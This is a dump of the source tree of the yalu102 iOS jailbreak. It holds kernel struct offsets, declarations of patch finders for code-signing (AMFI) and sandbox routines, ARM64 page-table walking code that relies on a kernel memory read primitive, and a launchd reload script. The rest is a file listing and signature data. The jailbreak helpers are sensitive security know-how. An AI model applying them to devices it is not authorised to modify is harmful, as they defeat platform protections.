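extern uint64_t struct_proc_p_ucred_offset;
extern uint64_t struct_proc_p_comm_offset;

// offsets in struct kauth_cred
extern uint64_t struct_kauth_cred_cr_ref_offset;

// offsets in struct uthread
extern uint64_t struct_uthread_uu_ucred_offset;
extern uint64_t struct_uthread_uu_list_offset;

// offsets in struct task
extern uint64_t struct_task_ref_count_offset;
extern uint64_t struct_task_itk_space_offset;

// offsets in struct ipc_space
extern uint64_t struct_ipc_space_is_table_offset;

// offsets in struct ipc_port
extern uint64_t struct_ipc_port_ip_kobject_offset;

void init_offsets();
extern uint64_t rootvnode_offset;

#endif

--------------------------------------------------------------------------------
/SourceCode/yalu102/patchfinder64.h:
--------------------------------------------------------------------------------
//
//  patchfinder64.h
//
//  Created by qwertyoruiop on 21/09/16.
//  Copyright © 2016 qwertyoruiop. All rights reserved.
//

#ifndef patchfinder64_h
#define patchfinder64_h

// NOTE(review): the header name after #import was lost in extraction. The
// declarations below need the fixed-width integer types and size_t; confirm
// the original import against the repository.
#import <stdint.h>
#import <stddef.h>

// Bounds of the regions the finder searches, and the in-memory copy they
// index into. Set through set_text_exec / set_prelink_exec / set_dump.
extern uint64_t text_exec_base;
extern uint64_t text_exec_size;

extern uint64_t prelink_exec_base;
extern uint64_t prelink_exec_size;

extern uint64_t whole_base;
extern uint64_t whole_size;
extern uint8_t* whole_dump;
extern uint64_t find_register_value(uint32_t* opcodes, uint64_t offset, uint64_t opcode_base, uint8_t reg);
extern uint64_t find_reference(uint32_t* opcodes, size_t opcode_size, uint64_t opcode_base, uint64_t target);
// Which of the two regions above a lookup should use.
enum Search {
    SearchTextExec,
    SearchPrelinkExec
};
extern char uref;
extern uint64_t get_data_for_mode(uint64_t offset, enum Search mode);



void set_text_exec(uint64_t text_exec_base_,uint64_t text_exec_size_);
void set_prelink_exec(uint64_t prelink_exec_base_, uint64_t prelink_exec_size_);
void set_dump(uint64_t whole_base_,uint64_t whole_size_, uint8_t* whole_dump_);
// The implementations of the find_* routines ship only as patchfinder64.o;
// their bodies are not on this page.
uint64_t find_kernel_pmap();
uint64_t find_gPhysBase();
uint64_t find_flushcache();
uint64_t find_amfi_memcmpstub();
uint64_t find_memwithphys();
uint64_t find_kernel_mount();
uint64_t find_vnode_lookup();
uint64_t find_cpu_list();
uint64_t find_cpacr_write();
uint64_t find_lwvm_mapio_patch();
uint64_t find_lwvm_mapio_newj();
uint64_t find_ret_non0();
uint64_t find_ret_0();
uint64_t find_amfiret();
uint64_t find_sbops();
// Code-signing status flags.
#define CS_VALID 0x0000001 /* dynamically valid */
#define CS_ADHOC 0x0000002 /* ad hoc signed */
#define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */
#define CS_INSTALLER 0x0000008 /* has installer entitlement */

#define CS_HARD 0x0000100 /* don't load invalid pages */
#define CS_KILL 0x0000200 /* kill process if it becomes invalid */
#define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */
#define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */
#define CS_ENFORCEMENT 0x0001000 /* require enforcement */
#define CS_REQUIRE_LV 0x0002000 /* require library validation */
#define CS_ENTITLEMENTS_VALIDATED 0x0004000

#define CS_ALLOWED_MACHO 0x00ffffe

#define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */
#define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */
#define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */
#define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */

#define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */
#define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */
#define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */
#define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */
#endif /* patchfinder64_h */

--------------------------------------------------------------------------------
/SourceCode/yalu102/patchfinder64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/patchfinder64.o
--------------------------------------------------------------------------------
/SourceCode/yalu102/pte_stuff.h:
--------------------------------------------------------------------------------
#ifndef pte_stuff_h
#define pte_stuff_h


// Translation table entries are 8 bytes, so an index becomes a byte offset
// by shifting left by 3.
#define TTE_INDEX_SHIFT 3
#define TTE_SIZE (1 << TTE_INDEX_SHIFT)
// Macro arguments are parenthesised so that a compound argument such as
// `A | B` keeps its meaning after expansion.
#define TTE_INDEX(vma, level) (((vma).vm_info.level ## _index) << TTE_INDEX_SHIFT)
#define TTE_GET(tte, mask) ((tte) & (mask))
#define TTE_SETB(tte, mask) ((tte) = (tte) | (mask))
#define TTE_SET(tte, mask, val) ((tte) = (((tte) & (~(mask))) | ((val) & (mask))))
#define TTE_IS_VALID_MASK 0x1
#define TTE_IS_TABLE_MASK 0x2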
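#define TTE_BLOCK_ATTR_INDEX_MASK 0x1C
#define TTE_BLOCK_ATTR_NS_MASK 0x20
#define TTE_BLOCK_ATTR_AP_MASK 0xC0
#define TTE_BLOCK_ATTR_AP_RO_MASK 0x80
#define TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK 0x40
#define TTE_BLOCK_ATTR_SH_MASK 0x300
#define TTE_BLOCK_ATTR_AF_MASK 0x400
#define TTE_BLOCK_ATTR_NG_MASK 0x800
#define TTE_PHYS_VALUE_MASK 0xFFFFFFFFF000ULL
#define TTE_BLOCK_ATTR_CONTIG_MASK (1ULL << 52)
#define TTE_BLOCK_ATTR_PXN_MASK (1ULL << 53)
#define TTE_BLOCK_ATTR_UXN_MASK (1ULL << 54)
// Argument parenthesised so an expression argument is converted as a whole.
#define VIRT_TO_PHYS(vaddr) ((vaddr) - gVirtBase + gPhysBase)
#define PHYS_TO_VIRT(paddr) ((paddr) - gPhysBase + gVirtBase)
// NOTE(review): these objects (and the functions below) are defined, not just
// declared, in a header; including it from more than one translation unit
// will give duplicate symbols for the initialised objects and the functions.
uint64_t gPhysBase,gVirtBase,pmap_store,level1_table,hibit_guess;

// A 64-bit virtual address split into table indices for a 4 KiB page size:
// 12 + 9 + 9 + 9 + 9 + 16 = 64 bits.
typedef union VMA_4K {
    struct {
        uint64_t block_off : 12;
        uint64_t level3_index : 9;
        uint64_t level2_index : 9;
        uint64_t level1_index : 9;
        uint64_t level0_index : 9;
        uint64_t ttbr_selector : 16;
    } __attribute__((packed)) vm_info;
    uint64_t vmaddr;
} VMA_4K;
// The same split for a 16 KiB page size: 14 + 11 + 11 + 11 + 1 + 16 = 64 bits.
typedef union VMA_16K {
    struct {
        uint64_t block_off : 14;
        uint64_t level3_index : 11;
        uint64_t level2_index : 11;
        uint64_t level1_index : 11;
        uint64_t level0_index : 1;
        uint64_t ttbr_selector : 16;
    } __attribute__((packed)) vm_info;
    uint64_t vmaddr;
} VMA_16K;

VMA_16K vad16;
VMA_4K vad4;
char isvad = 0;   // set to 1 by checkvad() when the host page size is 4096

#define TTELog NSLog
vm_size_t sz = 0; // host page size, filled in once by checkvad()

// Query the host page size on first use, cache it in `sz`, and set `isvad`
// when it is 4096. The return value of host_page_size() is not checked; the
// assert is the only guard and disappears when NDEBUG is defined.
void checkvad() {
    if (!sz) {
        host_page_size(mach_host_self(), &sz);
        assert(sz);
        if (sz == 4096) {
            isvad = 1;
        }
    }
}
// Log every field of one translation table entry: output address, table and
// valid bits, UXN/PXN, contiguous, nG, access flag, shareability and the two
// access-permission bits.
void parse_block_tte(uint64_t tte) {
    TTELog(@"TTE physaddr: %016llx", TTE_GET(tte, TTE_PHYS_VALUE_MASK));
    TTELog(@"TTE table: %d", !!(TTE_GET(tte, TTE_IS_TABLE_MASK)));
    TTELog(@"TTE valid: %d", !!(TTE_GET(tte, TTE_IS_VALID_MASK)));
    TTELog(@"TTE userland eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_UXN_MASK)));
    TTELog(@"TTE privileged eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_PXN_MASK)));
    TTELog(@"TTE contiguous: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_CONTIG_MASK)));
    TTELog(@"TTE not global: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_NG_MASK)));
    TTELog(@"TTE access flag: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_AF_MASK)));
    TTELog(@"TTE shareable: %01llx", (TTE_GET(tte, TTE_BLOCK_ATTR_SH_MASK) >> 8));
    TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_RO_MASK)) ? "Read only" : "Read/Write");
    TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK)) ? "EL0 (Userland) can access this page" : "EL0 (Userland) cannot access this page");
}

// Walk the translation tables for `vmaddr`, starting at `table` / `level`,
// and call `pagestuff_64_callback(entry_address, level)` once per level
// visited. A zero `table` means level1_table; a zero `level` means 1.
//
// ReadAnywhere64 is declared elsewhere (not in this header).
//
// Things a reader should know:
//  - because level 0 is rewritten to 1 on entry, the `case 0` arms below are
//    never reached;
//  - for 4 KiB pages the level-1 index is reduced by 0x1c0 before use; the
//    reason is not shown in this file;
//  - if `sz` is neither 4096 nor 16384, or `level` is outside 1..3, `tteaddr`
//    stays 0 and is still handed to the callback and to ReadAnywhere64;
//  - only the table bit is tested before descending; the valid bit is not.
void pagestuff_64(vm_address_t vmaddr, void (^pagestuff_64_callback)(vm_address_t tte_addr, int tte_level), vm_address_t table, int level) {

    checkvad();
    if (!table) table = level1_table;
    if (!level) level = 1;

    vm_address_t tteaddr = 0;

    if (sz == 4096) {
        VMA_4K target_addr;
        target_addr.vmaddr = vmaddr;

        if (level == 1) {
            target_addr.vm_info.level1_index -= 0x1c0;
        }

        switch (level) {
            case 0:
                tteaddr = table + TTE_INDEX(target_addr, level0);
                break;
            case 1:
                tteaddr = table + TTE_INDEX(target_addr, level1);
                break;

            case 2:
                tteaddr = table + TTE_INDEX(target_addr, level2);
                break;

            case 3:
                tteaddr = table + TTE_INDEX(target_addr, level3);
                break;

            default:
                break;
        }

    } else if (sz == 4096*4) {
        VMA_16K target_addr;
        target_addr.vmaddr = vmaddr;

        switch (level) {
            case 0:
                tteaddr = table + TTE_INDEX(target_addr, level0);
                break;
            case 1:
                tteaddr = table + TTE_INDEX(target_addr, level1);
                break;

            case 2:
                tteaddr = table + TTE_INDEX(target_addr, level2);
                break;

            case 3:
                tteaddr = table + TTE_INDEX(target_addr, level3);
                break;

            default:
                break;
        }

    }

    //parse_block_tte(level1_entry);

    pagestuff_64_callback(tteaddr, level);

    // Named level1_entry in the original, but it is the entry at whatever
    // level this call is processing.
    uint64_t level1_entry = ReadAnywhere64(tteaddr);

    if (TTE_GET(level1_entry, TTE_IS_TABLE_MASK) && level != 3) {
        // The entry holds a physical address; convert it before recursing.
        pagestuff_64(vmaddr, pagestuff_64_callback, PHYS_TO_VIRT(TTE_GET(level1_entry, TTE_PHYS_VALUE_MASK)), level + 1);
    }
}

// Return the output-address bits of the level-3 entry that maps `virtaddr`,
// or 0 when the walk never reaches level 3 (for example when an earlier
// entry does not have the table bit set). The page offset is not added, and
// the entry's valid bit is not checked. The walk starts at level 1 when
// `isvad` is set and at level 2 otherwise.
uint64_t findphys_real(uint64_t virtaddr) {
    __block uint64_t physvar = 0;
    pagestuff_64(virtaddr, ^(vm_address_t tte_addr, int tte_level) {
        uint64_t tte = ReadAnywhere64(tte_addr);
        if (tte_level == 3) {
            physvar = TTE_GET(tte, TTE_PHYS_VALUE_MASK);
        }
    }, level1_table, isvad ? 1 : 2);

    return physvar;

}
// Allocate `size` bytes with mach_vm_allocate in the task named by `tfp0`
// (declared elsewhere) and return the address. Despite the name, the value
// returned is a virtual address in that task's map. The kern_return_t is
// ignored, so a failed allocation is reported only as the initial 0.
uint64_t physalloc(uint64_t size) {
    uint64_t ret = 0;
    mach_vm_allocate(tfp0, (mach_vm_address_t*) &ret, size, VM_FLAGS_ANYWHERE);
    return ret;
}

#endif

--------------------------------------------------------------------------------
/SourceCode/yalu102/reload:
--------------------------------------------------------------------------------
#!/bin/sh
# Runs every file in /etc/rc.d, then unloads and reloads the launchd jobs.
# Anything placed in /etc/rc.d or /Library/LaunchDaemons is started with the
# privileges of whoever runs this script, so both directories are worth
# auditing on a device where it has run.
#
# Iterate with a glob and quote the path: parsing `ls` output and expanding
# $a unquoted splits names containing whitespace into a command plus
# arguments.
for rc in /etc/rc.d/*; do
    [ -f "$rc" ] || continue
    "$rc"
done
sleep 1
launchctl unload /System/Library/LaunchDaemons
launchctl load /System/Library/LaunchDaemons/com.apple.logd.plist
sleep 1
launchctl load /Library/LaunchDaemons
launchctl load /System/Library/LaunchDaemons

exit 0

--------------------------------------------------------------------------------
/SourceCode/yalu102/tar:
--------------------------------------------------------------------------------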
-------------------------------------------------------------------------------- /yalu102.app/0.reload.plist: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/0.reload.plist -------------------------------------------------------------------------------- /yalu102.app/AppIcon20x20@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon20x20@2x.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon20x20@2x~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon20x20@2x~ipad.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon20x20@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon20x20@3x.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon20x20~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon20x20~ipad.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon29x29@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon29x29@2x.png 
-------------------------------------------------------------------------------- /yalu102.app/AppIcon29x29@2x~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon29x29@2x~ipad.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon29x29@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon29x29@3x.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon29x29~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon29x29~ipad.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon40x40@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon40x40@2x.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon40x40@2x~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon40x40@2x~ipad.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon40x40@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon40x40@3x.png 
-------------------------------------------------------------------------------- /yalu102.app/AppIcon40x40~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon40x40~ipad.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon60x60@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon60x60@2x.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon60x60@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon60x60@3x.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon76x76@2x~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon76x76@2x~ipad.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon76x76~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon76x76~ipad.png -------------------------------------------------------------------------------- /yalu102.app/AppIcon83.5x83.5@2x~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/AppIcon83.5x83.5@2x~ipad.png 
-------------------------------------------------------------------------------- /yalu102.app/Base.lproj/LaunchScreen.storyboardc/01J-lp-oVM-view-Ze5-6b-2t3.nib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/Base.lproj/LaunchScreen.storyboardc/01J-lp-oVM-view-Ze5-6b-2t3.nib -------------------------------------------------------------------------------- /yalu102.app/Base.lproj/LaunchScreen.storyboardc/Info.plist: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/Base.lproj/LaunchScreen.storyboardc/Info.plist -------------------------------------------------------------------------------- /yalu102.app/Base.lproj/LaunchScreen.storyboardc/UIViewController-01J-lp-oVM.nib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/Base.lproj/LaunchScreen.storyboardc/UIViewController-01J-lp-oVM.nib -------------------------------------------------------------------------------- /yalu102.app/Base.lproj/Main.storyboardc/BYZ-38-t0r-view-8bC-Xf-vdC.nib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/Base.lproj/Main.storyboardc/BYZ-38-t0r-view-8bC-Xf-vdC.nib -------------------------------------------------------------------------------- /yalu102.app/Base.lproj/Main.storyboardc/Info.plist: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/Base.lproj/Main.storyboardc/Info.plist 
-------------------------------------------------------------------------------- /yalu102.app/Base.lproj/Main.storyboardc/UIViewController-BYZ-38-t0r.nib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/Base.lproj/Main.storyboardc/UIViewController-BYZ-38-t0r.nib -------------------------------------------------------------------------------- /yalu102.app/Info.plist: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/Info.plist -------------------------------------------------------------------------------- /yalu102.app/PkgInfo: -------------------------------------------------------------------------------- 1 | APPL???? -------------------------------------------------------------------------------- /yalu102.app/_CodeSignature/CodeResources: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | files 6 | 7 | 0.reload.plist 8 | 9 | 5Kjw0hWFiOO6z/ghqWvRpKceJQE= 10 | 11 | AppIcon20x20@2x.png 12 | 13 | 5dxNidyfY/+JIFKqIe4xkrVGLZg= 14 | 15 | AppIcon20x20@2x~ipad.png 16 | 17 | 5dxNidyfY/+JIFKqIe4xkrVGLZg= 18 | 19 | AppIcon20x20@3x.png 20 | 21 | UNKQp+EJbgXN3kRFhJ9R3J8Wd5s= 22 | 23 | AppIcon20x20~ipad.png 24 | 25 | oF4h0Y9EePmb+n214Y09P/kVRG4= 26 | 27 | AppIcon29x29@2x.png 28 | 29 | FRAndYihYJC4Xu+faGeZ5hrdM+0= 30 | 31 | AppIcon29x29@2x~ipad.png 32 | 33 | FRAndYihYJC4Xu+faGeZ5hrdM+0= 34 | 35 | AppIcon29x29@3x.png 36 | 37 | bBxF5tAupkF9UFhZXkkZxvXA5CA= 38 | 39 | AppIcon29x29~ipad.png 40 | 41 | UCeWvzZq7D21yhKWDue/WmKu140= 42 | 43 | AppIcon40x40@2x.png 44 | 45 | X2dtzMsq1sNco4V1hZk98O5jhm0= 46 | 47 | AppIcon40x40@2x~ipad.png 48 | 49 | X2dtzMsq1sNco4V1hZk98O5jhm0= 50 | 51 | AppIcon40x40@3x.png 52 | 53 | 167wTBmLmdzpd16bsMTCvdy0uB8= 54 | 55 | 
AppIcon40x40~ipad.png 56 | 57 | 5dxNidyfY/+JIFKqIe4xkrVGLZg= 58 | 59 | AppIcon60x60@2x.png 60 | 61 | LCr5vcv7EBgA5ujfGKXIDda2NNA= 62 | 63 | AppIcon60x60@3x.png 64 | 65 | XcK0gZgNnsETXQJ+BegwTp13Bfo= 66 | 67 | AppIcon76x76@2x~ipad.png 68 | 69 | 4SQeBURGDhY9V4nWFVI13EoTZKM= 70 | 71 | AppIcon76x76~ipad.png 72 | 73 | zQnouJFAEd9zfvgWbxN5+2lSmXY= 74 | 75 | AppIcon83.5x83.5@2x~ipad.png 76 | 77 | HOfyprdtHh/3nNKszpl8LfiSLqc= 78 | 79 | Base.lproj/LaunchScreen.storyboardc/01J-lp-oVM-view-Ze5-6b-2t3.nib 80 | 81 | hash 82 | 83 | W6YTg2qMCXj+M1t5ZkSwpyzmn1Q= 84 | 85 | optional 86 | 87 | 88 | Base.lproj/LaunchScreen.storyboardc/Info.plist 89 | 90 | hash 91 | 92 | n2t8gsDpfE6XkhG31p7IQJRxTxU= 93 | 94 | optional 95 | 96 | 97 | Base.lproj/LaunchScreen.storyboardc/UIViewController-01J-lp-oVM.nib 98 | 99 | hash 100 | 101 | iYiz1Wnz7G0ByiaEarkZjw5pZ50= 102 | 103 | optional 104 | 105 | 106 | Base.lproj/Main.storyboardc/BYZ-38-t0r-view-8bC-Xf-vdC.nib 107 | 108 | hash 109 | 110 | dCTco81HlI53icsxkmpY4ma7uiE= 111 | 112 | optional 113 | 114 | 115 | Base.lproj/Main.storyboardc/Info.plist 116 | 117 | hash 118 | 119 | MDrKFvFWroTb0+KEbQShBcoBvo4= 120 | 121 | optional 122 | 123 | 124 | Base.lproj/Main.storyboardc/UIViewController-BYZ-38-t0r.nib 125 | 126 | hash 127 | 128 | MYNbw9VpODUPJW83AGF5PRM4cH0= 129 | 130 | optional 131 | 132 | 133 | Info.plist 134 | 135 | ly+BPUNSE/9/mZSBS8wko4XImqo= 136 | 137 | PkgInfo 138 | 139 | n57qDP4tZfLD1rCS43W0B4LQjzE= 140 | 141 | bootstrap.tar 142 | 143 | M3F+Y2xXX53vUfHzcej+W4/JCzc= 144 | 145 | embedded.mobileprovision 146 | 147 | pQnMEgsSdbaNcrzCD399Rd8EtrM= 148 | 149 | launchctl 150 | 151 | QvbrRKZyHftjDQ5QhNnC8Y0aTag= 152 | 153 | reload 154 | 155 | nnTE9lXtABwAybaHACL97ObkK68= 156 | 157 | tar 158 | 159 | xReGJgbRaSU/njYXXhu6JZ7kk1s= 160 | 161 | 162 | files2 163 | 164 | 0.reload.plist 165 | 166 | hash 167 | 168 | 5Kjw0hWFiOO6z/ghqWvRpKceJQE= 169 | 170 | hash2 171 | 172 | +LOdR96/KX1Fb8fbgJcICidCq1QHyc9zcIumuhsV4C0= 173 | 174 | 175 | AppIcon20x20@2x.png 176 
| 177 | hash 178 | 179 | 5dxNidyfY/+JIFKqIe4xkrVGLZg= 180 | 181 | hash2 182 | 183 | DScN830fscFtzRNBKWOnCDAYn0EaRXATh5RFSmf1ys0= 184 | 185 | 186 | AppIcon20x20@2x~ipad.png 187 | 188 | hash 189 | 190 | 5dxNidyfY/+JIFKqIe4xkrVGLZg= 191 | 192 | hash2 193 | 194 | DScN830fscFtzRNBKWOnCDAYn0EaRXATh5RFSmf1ys0= 195 | 196 | 197 | AppIcon20x20@3x.png 198 | 199 | hash 200 | 201 | UNKQp+EJbgXN3kRFhJ9R3J8Wd5s= 202 | 203 | hash2 204 | 205 | tGp1Tlnvxq49fwM8izZzsOXXnweaG2STFgCZo03Tpqw= 206 | 207 | 208 | AppIcon20x20~ipad.png 209 | 210 | hash 211 | 212 | oF4h0Y9EePmb+n214Y09P/kVRG4= 213 | 214 | hash2 215 | 216 | R5rsIwg6Y//uqwHVDs+/ftM3beWKpTYr3UWuu5ooHps= 217 | 218 | 219 | AppIcon29x29@2x.png 220 | 221 | hash 222 | 223 | FRAndYihYJC4Xu+faGeZ5hrdM+0= 224 | 225 | hash2 226 | 227 | gYLKwYd1bEAv463MaZMDkeiJcC0Tx35vN/ddba8+lik= 228 | 229 | 230 | AppIcon29x29@2x~ipad.png 231 | 232 | hash 233 | 234 | FRAndYihYJC4Xu+faGeZ5hrdM+0= 235 | 236 | hash2 237 | 238 | gYLKwYd1bEAv463MaZMDkeiJcC0Tx35vN/ddba8+lik= 239 | 240 | 241 | AppIcon29x29@3x.png 242 | 243 | hash 244 | 245 | bBxF5tAupkF9UFhZXkkZxvXA5CA= 246 | 247 | hash2 248 | 249 | BgQ5IkdsPdEicwxUsqVxfIYk37xpL7nqYvW/59JEIy4= 250 | 251 | 252 | AppIcon29x29~ipad.png 253 | 254 | hash 255 | 256 | UCeWvzZq7D21yhKWDue/WmKu140= 257 | 258 | hash2 259 | 260 | DYvg99izL8Pua6xlGXUk08e12rUltsYxhM2dSWUPT9s= 261 | 262 | 263 | AppIcon40x40@2x.png 264 | 265 | hash 266 | 267 | X2dtzMsq1sNco4V1hZk98O5jhm0= 268 | 269 | hash2 270 | 271 | l5rwZlX8hwo4qtOvU4l5z7o9K2bakstI80u8ntoJ+yI= 272 | 273 | 274 | AppIcon40x40@2x~ipad.png 275 | 276 | hash 277 | 278 | X2dtzMsq1sNco4V1hZk98O5jhm0= 279 | 280 | hash2 281 | 282 | l5rwZlX8hwo4qtOvU4l5z7o9K2bakstI80u8ntoJ+yI= 283 | 284 | 285 | AppIcon40x40@3x.png 286 | 287 | hash 288 | 289 | 167wTBmLmdzpd16bsMTCvdy0uB8= 290 | 291 | hash2 292 | 293 | a1Ksq7CLQF0vRMlgrf2mBWsQwgL852NMQ4XdTS9gX9M= 294 | 295 | 296 | AppIcon40x40~ipad.png 297 | 298 | hash 299 | 300 | 5dxNidyfY/+JIFKqIe4xkrVGLZg= 301 | 302 | hash2 303 | 304 | 
DScN830fscFtzRNBKWOnCDAYn0EaRXATh5RFSmf1ys0= 305 | 306 | 307 | AppIcon60x60@2x.png 308 | 309 | hash 310 | 311 | LCr5vcv7EBgA5ujfGKXIDda2NNA= 312 | 313 | hash2 314 | 315 | hXoyNrM3U1SrwgStlMyvMye9oWIMvCOaYLeYuvOUqs4= 316 | 317 | 318 | AppIcon60x60@3x.png 319 | 320 | hash 321 | 322 | XcK0gZgNnsETXQJ+BegwTp13Bfo= 323 | 324 | hash2 325 | 326 | U6QBObAB3bXz4qilDofr9BH+rHbw2BJCxompqGz7g60= 327 | 328 | 329 | AppIcon76x76@2x~ipad.png 330 | 331 | hash 332 | 333 | 4SQeBURGDhY9V4nWFVI13EoTZKM= 334 | 335 | hash2 336 | 337 | gWUgNn8Z+fNNK0Zz+axSb661YJrlfAv5vzOJ6eIrUyc= 338 | 339 | 340 | AppIcon76x76~ipad.png 341 | 342 | hash 343 | 344 | zQnouJFAEd9zfvgWbxN5+2lSmXY= 345 | 346 | hash2 347 | 348 | LRsDG3wp4UjCQW9tiqkso6YKBrYNL01IM0dySqLsZh8= 349 | 350 | 351 | AppIcon83.5x83.5@2x~ipad.png 352 | 353 | hash 354 | 355 | HOfyprdtHh/3nNKszpl8LfiSLqc= 356 | 357 | hash2 358 | 359 | pPWzhkSFf4xe6brC09Cyz+ZbP6XjbL8ioAfQ/bcdVFs= 360 | 361 | 362 | Base.lproj/LaunchScreen.storyboardc/01J-lp-oVM-view-Ze5-6b-2t3.nib 363 | 364 | hash 365 | 366 | W6YTg2qMCXj+M1t5ZkSwpyzmn1Q= 367 | 368 | hash2 369 | 370 | YQY25BavFTSz0guCja3ckZzjgaeth16m3bNAJvZvgK4= 371 | 372 | optional 373 | 374 | 375 | Base.lproj/LaunchScreen.storyboardc/Info.plist 376 | 377 | hash 378 | 379 | n2t8gsDpfE6XkhG31p7IQJRxTxU= 380 | 381 | hash2 382 | 383 | HyVdXMU7Ux4/KalAao30mpWOK/lEPT4gvYN09wf31cg= 384 | 385 | optional 386 | 387 | 388 | Base.lproj/LaunchScreen.storyboardc/UIViewController-01J-lp-oVM.nib 389 | 390 | hash 391 | 392 | iYiz1Wnz7G0ByiaEarkZjw5pZ50= 393 | 394 | hash2 395 | 396 | m3MrtalB7Dj1NNHX9rv5ollHEgMVO5HZ2wnmQN99DYY= 397 | 398 | optional 399 | 400 | 401 | 